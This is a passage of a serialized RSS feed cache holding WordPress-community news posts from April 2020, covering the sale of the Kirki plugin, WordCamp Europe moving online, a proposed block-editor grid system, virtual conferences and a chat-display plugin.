Stathopoulos said the majority of the offers were from buyers with no interest in growing the plugin. Most of them seemed to be looking for a quick buck. He steered clear of them because he did not want to see end-users blasted with obtrusive ads, upsells, or spam.

\n\n\n\n

“In the end, I didn’t go with the highest bid, which was 2.5 times the price I gave it for,” he said. “Though I admit I was seriously tempted to ‘take the money and run.’ I went with what I felt was an ethical choice, someone who actually uses the project on a daily basis, wants to evolve it, and I feel will honor the open-source spirit and the six years of sweat.”

\n\n\n\n

Stathopoulos decided to sell to Vongries. The two had previously worked together on multiple occasions on the Kirki project and he felt it was the right move.

\n\n\n\n

“Once I decided that he should get it, the process went pretty smooth, and there were no hiccups,” said Stathopoulos. “The hard part was deciding who should get it.”

\n\n\n\n

Vongries was almost a natural choice as a new owner. He and his team had been using Kirki since its inception. “I think it’s an incredible framework and it makes working with the WordPress customizer so much easier,” he said.

\n\n\n\n

He reached out to Stathopoulos immediately upon seeing it was for sale. The two had a conversation soon thereafter and shared similar visions for the plugin.

\n\n\n\n

“I always looked at Kirki as something special and wanted to get involved,” said Vongries. “Until recently though, I wouldn’t have had the resources to do so, but since the team around MapSteps has grown it just all happened at the right time. Being a Kirki user myself, I looked at this from both perspectives — from a developer standpoint and as someone that has been using the plugin for years.”

\n\n\n\n

The Future of Kirki

\n\n\n\n

Over the past 18 months, Stathopoulos has rewritten the plugin and split it into around 50 Composer packages. The plan was to make these packages installable as individual components for plugin and theme authors. Instead of bundling the entire Kirki library, developers can use the pieces they need. At this point, these components should be stable, but they have not been widely tested by theme authors, who are accustomed to working with the full framework.

\n\n\n\n

He was also excited about the potential move away from the customizer and working with full-site editing and global styles. Right now, it is unclear how the future of the Gutenberg project will impact the customizer. Many theme authors are now looking at it as a dying piece of the platform. Stathopoulos felt like there was still room to grow and transition into the new era.

\n\n\n\n

“My vision for Kirki was to combine some things with full-site editing, and allow themes that were using Kirki to automatically get global styles when they land in WordPress core,” he said. “That would be truly amazing, and I’m sure it will be possible to do once there is an API for global styles. If [Vongries] goes in that direction, there’s definitely potential for monetization there, while at the same time he’ll help people build better things. Can you imagine a painless transition to global styles for themes that use Kirki? That would be a great thing to see!”

\n\n\n\n

However, the project is out of the former owner’s hands now. It is Vongries’ vision that must lead the project moving forward.

\n\n\n\n

“I respect Ari a lot and he has done an amazing job with Kirki,” said Vongries. “[Stathopoulos] said he would love to continue to contribute to the project, and he is more than welcome to do so.”

\n\n\n\n

The immediate plan is to launch Kirki 4.0. It is nearly ready to roll out, awaiting some fine-tuning and final testing. Vongries and his team are also about to begin work on new extensions that bring more controls and functionality to the framework and, potentially, Gutenberg.

\n\n\n\n

“We are going to explore how we can make the connection between the existing functionality in Kirki and the upcoming features in Gutenberg and Gutenberg in general,” he said. “At this point, we have some ideas about how we can adapt Kirki to the ever-changing WordPress platform. But for now, they are only ideas. We are certain that we will be able to provide a useful tool for developers, regardless of the direction WordPress and Gutenberg goes.”

\n\n\n\n

The new team behind Kirki is still working on the long-term roadmap. It will be exciting to see where they take it. For now, it is still the go-to customizer framework for many theme authors. And, it is in the hands of someone who has been using the project for years.

\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 28 Apr 2020 18:39:32 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Justin Tadlock\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:15;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:77:\"WPTavern: WordCamp Europe 2020 Online Registration Now Open: Tickets are Free\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:29:\"https://wptavern.com/?p=98976\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:197:\"https://wptavern.com/wordcamp-europe-2020-online-registration-now-open-tickets-are-free?utm_source=rss&utm_medium=rss&utm_campaign=wordcamp-europe-2020-online-registration-now-open-tickets-are-free\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2514:\"

WordCamp Europe 2020 is just 37 days away. Organizers announced in April that the event, which was supposed to be hosted in Porto, is moving to be 100% online this year due to the COVID-19 pandemic. WCEU will kick off with a virtual Contributor Day on June 4, followed by two half days of talks and workshops broadcasted via livestream.

\n\n\n\n

WordCamp Europe is one of the largest regional WordCamps on the planet and has been hosted in many magnificent venues and inspiring cities over the years. The event routinely sells out of tickets and sponsor packages, as companies and attendees rally around this unique opportunity to connect across boundaries, uniting Europe through a shared love of WordPress.

\n\n\n\n

For the first time in the event’s eight-year history, the European WordPress community will have to forego the in-person networking time that many have come to value as both a personal and professional highlight of the year. WCEU Organizers have worked for the better part of a decade to make it one of the most polished and efficient WordCamps. Now the team is forced to pivot and use their expertise to host a top-notch virtual event.

\n\n\n\n

Past local organizing teams have been successful at creating an intimate atmosphere that facilitates rewarding connections with a focus on hospitality. These in-person connections add context to remote interactions and conversations long after the event concludes. Reaching this same high level of interpersonal connectivity between attendees is going to be a challenge for this online edition, but WCEU organizers have a long track record of adapting to different environments. Dozens of other WordPress meetups, WordCamps, and educational events are currently facing the same challenges and are moving online.

\n\n\n\n

Registering for a ticket to WCEU is optional but attendees who want to participate in the virtual networking, Q&A sessions, and contributor day will have be registered. Organizers were expecting approximately 3,000 attendees but hosting the event online may affect those numbers in either direction. Tickets are available for free on the WCEU website, thanks to the event’s sponsors. After eight hours of open registration, there are 4,257 tickets remaining. The event will return to Porto, Portugal, on June 3-5, 2021.

\n\n\n\n

\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 27 Apr 2020 23:10:17 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:16;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"WPTavern: Should the Block Editor Have a Grid System?\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:29:\"https://wptavern.com/?p=99028\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:149:\"https://wptavern.com/should-the-block-editor-have-a-grid-system?utm_source=rss&utm_medium=rss&utm_campaign=should-the-block-editor-have-a-grid-system\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:5456:\"

Laying out a webpage design and getting every element aligned perfectly can be a tough job. Even many developers rely on CSS grid frameworks. Granted, with the introduction of the flexbox and grid systems in the CSS language, such frameworks are becoming unnecessary. Whether it is getting the vertical and horizontal rhythm down or simply aligning an image next to a bit of text, page layouts are often done best via some sort of grid system.

\n\n\n\n

This becomes even more apparent when building a page layout visually through the WordPress block editor. The current iteration of the editor does a fine job of being a general content editor while providing the ability to insert various elements into the page.

\n\n\n\n

However, it is not by any means a page builder — yet.

\n\n\n\n

The question is, before we engage in full-site editing, global styles, block patterns, and other upcoming tools, whether a grid system should be a part of the equation. If so, how should that system work? Will it be configurable by theme authors? How will it handle tablet and mobile views? Will the grid be visible to users or a hidden thing in the background?

\n\n\n\n

As more block plugins are released, particularly with those that may have multiple elements that may need to be aligned, it might be time we consider a grid system. Such a system may benefit existing core blocks right now, such as Columns and Media & Text. Or, it may be better as a separate, standalone block.

\n\n\n\n

Including a grid system also has the additional benefit of standardizing on layout-related class names that theme authors can use in their CSS, even outside the content editor. This would bring better compatibility across the board when users inevitably switch themes.

\n\n\n\n

A Starting Point: Layout Grid Block

\n\n\n\nThree-column layout with Layout Grid Block.\n\n\n\n

Automattic, as part of its Block Experiments project, has released the Layout Grid Block plugin. It is essentially a beefed-up version of the core Columns block. The major difference is that column alignment snaps to a specific point in the grid. This grid is also displayed in the background while editing the post.

\n\n\n\n

The tricky thing with grids is not simple alignment in columns in desktop view. It is dealing with how those columns transform on smaller devices like tablets and smartphones. Sometimes that is a guessing game from a theme design perspective because the theme author is not privy to the actual content that needs to be aligned. In turn, designers make best-guess decisions and hope it works for most.

\n\n\n\n

The Layout Grid block has a “Responsive Breakpoints” tab under the block options panel that allows users to configure this based on device. Users can decide how individual columns span the grid. The grid system is based on a varying number of grid sections based on the device:

\n\n\n\n\n\n\n\n

Imagine wanting to display a simple image with text to the next of it. There are various ways to do this currently in the block editor. Each has its pros and cons, depending on what you want to do. From a user experience and visual standpoint, I love seeing the grid lines in place as I determine how it should be displayed.

\n\n\n\nAligning an image and text on a grid.\n\n\n\n

Another upside of having a grid system is consistency in design. If users can scale the width of columns based on arbitrary numbers, much like they can now do with the Media & Text block, there is no consistency with sizing items horizontally on the page. A grid system changes that.

\n\n\n\n

Layout Grid Block still needs some polishing at this point. There are some trivial pain points in the UI that could be improved. On the whole, my experience with this block offered a compelling argument for including a grid system in core.

\n\n\n\n

The plugin addresses simple one, two, three, and four columns right now. The grid system in CSS is much more powerful than basic horizontal columns. However, starting with the basics would give us a place to build from.

\n\n\n\n

Should Core Include a Grid?

\n\n\n\n

There is at least one open ticket on the Gutenberg repository for addressing a grid system. Mark Uraine, the author of the ticket, posted seven key questions:

\n\n\n\n
  1. Should the grid system be responsive?
  2. Should there be a default Gutenberg grid system, but allow themes to register their own?
  3. Should the grid system conform to the current structure of Gutenberg blocks, or should it be its own thing that we need to restructure the blocks to in the editor?
  4. Should the grid include gutters?
  5. Should the grid include, or allow, any vertical alignment snaps?
  6. What should the grid be based on? (ie. 12 columns, pixel grid, etc.)
  7. Should the grid allow toggling on/off? And also include a setting to show, or not, when resizing objects in the editor?
\n\n\n\n

The ticket had some solid discussion nearly a year ago but not much as of late. Would you like to see a grid system in the editor? If so, how would you want it to work?

\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 27 Apr 2020 20:24:08 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Justin Tadlock\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:17;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"Matt: Tulsa Remote Worker Experiment\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:22:\"https://ma.tt/?p=51280\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"https://ma.tt/2020/04/tulsa-remote-worker-experiment/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1120:\"

Sarah Holder at Citylab has an interesting article on a program that paid people $10,000, a year of co-working, and a subsidized apartment to move to Tulsa, Oklahoma.

\n\n\n\n

Traditionally, cities looking to spur their economies may offer incentives to attract businesses. But at a time when Americans are moving less frequently than they have in more than half a century, and the anticlimactic race to host an Amazon HQ2 soured some governments on corporate tax breaks, Tulsa is one of several locales testing out a new premise:  Pay people instead.

\n\n\n\n

I love this idea, and hope that after the permanent step-up in remote work from the virus we see much more internal mobility between cities in the United States.

\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 27 Apr 2020 17:55:45 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:18;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:76:\"WPTavern: Watch the Women of React Conference for Free on Saturday, April 25\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:29:\"https://wptavern.com/?p=98982\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:195:\"https://wptavern.com/watch-the-women-of-react-conference-for-free-on-saturday-april-25?utm_source=rss&utm_medium=rss&utm_campaign=watch-the-women-of-react-conference-for-free-on-saturday-april-25\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4140:\"

While much of the world is in lockdown, public gatherings and conferences have been cancelled, leaving a void in the lives of people who enjoy meeting their fellow open source contributors and colleagues in person throughout the year. Virtual events, which were already on the rise, are enjoying a bit of a renaissance by necessity.

\n\n\n\n

On Saturday, April 25, the Women of React conference will stream live with seven speakers, along with Q&A and lightning sessions from React core contributors and leaders in the community. The event will include a single-stream of talks with breaks for socializing and connecting with other attendees, as well as an invite-only Discord chat server.

\n\n\n\n
\n

This Saturday (Apr 25) Women of React has a special Q and A session with our favorite React core contributors past & present @sophiebits @ProvablyFlarnie @lunaruan and Chrome collaborators @shubhie and @stubbornella! RSVP for free at https://t.co/GksJeHLvF6 pic.twitter.com/0bho86YVe6

— R \'Nearest\' Nabors 💙 (@rachelnabors) April 23, 2020
\n
\n\n\n\n

Women of React was organized as a sort of pop-up tech event in response to current events. Co-organizers Rachel Nabors, Kevin Lewis, Sara Vieira, and Jenn Creighton did not put out a request for speakers but rather opted to invite women from around the world who would provide quality presentations on diverse topics of interest to the React community.

\n\n\n\n

“I think I woke up one morning and was watching the pandemic news and realized all the cool women I would usually see on the conference circuit cannot give their talks and I’m not going to see them,” Rachel Nabors said on a recent episode of the Inside Facebook Mobile podcast. “I’m not going to see any of my favorite women in the React community this year and it was super depressing.” She contacted her colleagues and together they quickly spun up a conference that would allow women in React to connect online.

\n\n\n\n

Last week the organizers reported more than 1,000 registered attendees. They expect that number to be over 2,000 on the day of the conference. Fortunately, they don’t have to have a hard count on attendees ahead of time, since virtual events don’t have a limited number of seats. Organizers have even created printable swag for all who attend.

\n\n\n\n
\n

The cuteness has landed! We will be shipping out coloring pages for #womenofreact2020 attendees tonight—something for you or your little ones to do while watching the talks tomorrow! Art by the phenomenal @miuki_miu! pic.twitter.com/49byxsCeWW

— R \'Nearest\' Nabors 💙 (@rachelnabors) April 24, 2020
\n
\n\n\n\n

Women of React will run from 12:30pm—8:00pm EST. Attendees can sign up on the website and will receive a link for the livestream. Organizers are also planning to record the sessions so that people who are unable to attend can watch it at a later time.

\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 24 Apr 2020 21:35:10 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:19;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:91:\"WPTavern: WP Feedback Kicks off Free Virtual Summit for WordPress Professionals on April 27\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:29:\"https://wptavern.com/?p=98970\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:227:\"https://wptavern.com/wp-feedback-kicks-off-free-virtual-summit-for-wordpress-professionals-on-april-27?utm_source=rss&utm_medium=rss&utm_campaign=wp-feedback-kicks-off-free-virtual-summit-for-wordpress-professionals-on-april-27\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:5564:\"\n\n\n\n

WP Feedback is running a virtual event from April 27 – May 1. The event is primarily geared toward WordPress professionals who are looking to scale their business. It will feature CEOs, designers, freelancers, and more from the WordPress space. Between five and seven video sessions will be available each new day of the event.

\n\n\n\n

The sessions are free to watch for the full 24-hour period on the day they are scheduled. Once that window closes, visitors must purchase an all-access pass to view them, which is currently available for $67 but will go up to $97 once the event begins. A one-time purchase provides lifetime access.

\n\n\n\n

“Due to the outbreak of Coronavirus, otherwise known as COVID-19, every event has been postponed or outright canceled for the foreseeable future,” said Vito Peleg, founder of WP Feedback. “Seeing that the opportunity to learn and network with like-minded professionals was taken away from us at the last second, we decided to step in to provide the true conference experience all without leaving your desk.”

\n\n\n\n

The goal of the summit is provide value by teaching attendees how to scale their agency or freelance business by having experts in their respective fields share advice.

\n\n\n\n

“Above all, the best part is that it’s completely free to attend, and although some of us can’t wait to get out, I’m sure others will agree it’s also really nice that you can attend all from the comfort of your home office — or living rooms!” said Peleg.

\n\n\n\n

The WP Feedback team hopes that everyone from freelancers to large agencies and businesses can learn something. “So to that end, the event is geared towards WordPress professionals who are looking to scale their business beyond themselves (without losing all of their hair), people struggling during the quarantine/lockdown as a result of an impact that this has had on their business, and people who are just looking to meet and network with other like-minded people in the community,” said Peleg.

\n\n\n\n

The goal for WP Feedback is to help WordPress professionals succeed and scale their business via the site’s network and feedback plugin. “This effort is two-fold,” said Peleg. “We primarily do this with our software that simplifies and organizes client communication for web designers. But, we also do so with summits just like this one, educating people through our content and community platform.”

\n\n\n\n

For those interested in seeing what type of content the summit offers, Piccia Neri’s session from 2019, The Main Ingredient of Great UX, is available to watch for free.

\n\n\n\n

Continuation of WP Agency Summit

\n\n\n\n

Last December, before joining the WP Feedback team, Jan Koch launched the first version of this event. Over 2,000 attendees registered and recorded 15,000 session views. Strictly by the numbers, the event was successful.

\n\n\n\n

“Measuring the success of the 2019 summit event in numbers would not even tell half of the story,” said Peleg. “Most exciting were all the ripple effects the event caused. So many new connections were made not just from Jan’s perspective but also in the community that formed around the event on Facebook. We’re all still leveraging these new friendships and hope that, with the improved networking area for the new summit, we’ll see even more connections being made.”

\n\n\n\n

With Koch joining WP Feedback, the team felt like it was a natural move to continue the event. “One of the main reasons Jan joined the team was to be heavily involved with our summit plans due to his experience and success with the WP Agency Summit last year,” said Peleg. “As this is WP FeedBack’s first summit, having Jan on the team has made it possible for us to organize it in such a short amount of time. He’s taught us a lot and we will 100% be using everything we’ve learned to do more like this in the future.”

\n\n\n\n

One of the issues with the 2019 event was the lack of gender diversity. There was a 20:4 male-to-female speaker ratio. The team has attempted to address this for the 2020 event by adding more women to the lineup.

\n\n\n\n

“Yes, that was a hard lesson learned for Jan,” Peleg said in response to the low number of women speakers. “He and the entire team at WP FeedBack leveraged our connections to get a more even ratio this time. Obviously, there are many successful women in the WordPress space, and now we were able to bring a few of our friends on thanks to our combined networks.”

\n\n\n\n

The WP Feedback team has been collectively working to make this year’s event a success. Peleg said that many on the team have had to quickly adapt and learn how to run such an event. “Thankfully, Jan’s experience has massively helped in how we have been planning everything, and he is the one heading up all of the sessions too,” he said. “The vision was to create a summit experience online that replicates how it feels to go to a summit in real life, and we are really taking huge steps to provide that experience for all of our attendees.”

\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 24 Apr 2020 18:50:03 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Justin Tadlock\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:20;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:71:\"WPTavern: Chatterbox Plugin Uses WordPress Blocks to Show Conversations\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:29:\"https://wptavern.com/?p=98923\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:187:\"https://wptavern.com/chatterbox-plugin-uses-wordpress-blocks-to-show-conversations?utm_source=rss&utm_medium=rss&utm_campaign=chatterbox-plugin-uses-wordpress-blocks-to-show-conversations\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2361:\"

Chatterbox is a new plugin with a fun and creative use for the block editor. It displays chat or text threads using blocks that are styled as conversations. Users can type in a record of a chat, including timestamps, with a live preview in the editor.

\n\n\n\n
\n\n\n\n

Since written conversations are essentially little blocks of text and media, the block editor lends itself nicely to composing and displaying this type of content. The Chatterbox block can be found under Layout Elements in the block inserter. It includes the option to select a style (Inbound, Outbound, or Event) and add a timestamp.

\n\n\n\n
\n\n\n\n

Dave Ryan, a WordPress developer at Bluehost, said he created the plugin in order to test Gutenberg’s Block Context API and borrowed the chat component from Salesforce’s Lightning Design System. He suggested that Chatterbox could be useful for showing demos of chat bots, publishing chat records in news stories, or simply adding an engaging visual display to conversations.

\n\n\n\n

Once the Block Context API matures, Ryan plans to add message background and text colors, message sender with name and avatar, and the ability to override the message sender on a per-message basis for group chats. The next steps beyond that on the roadmap include the following:

\n\n\n\n\n\n\n\n

Ryan said some of the planned features will rely on new features in the Gutenberg project. Once those have been released he will update Chatterbox to include more customization options. The plugin is available for free on WordPress.org and contributors can find the code on GitHub.

\n\n\n\n

\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 24 Apr 2020 03:55:41 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:21;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:83:\"WPTavern: You Deserve to Wear Sweatpants; Don’t Let Anyone Tell You Any Different\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:29:\"https://wptavern.com/?p=98783\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:203:\"https://wptavern.com/you-deserve-to-wear-sweatpants-dont-let-anyone-tell-you-any-different?utm_source=rss&utm_medium=rss&utm_campaign=you-deserve-to-wear-sweatpants-dont-let-anyone-tell-you-any-different\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:5468:\"\n\n\n\n

Lounge in your Baby Yoda sweats. Break out those knee-high Santa socks that you love to wear during the holidays. Slide into your Rocket City Trash Pandas tee and pretend the baseball season is going to happen this year.

\n\n\n\n

Sure, you can wear a suit and tie when you’re working from home. However, I invite you to ditch the fresh-pressed trousers for your comfy sweatpants.

\n\n\n\n

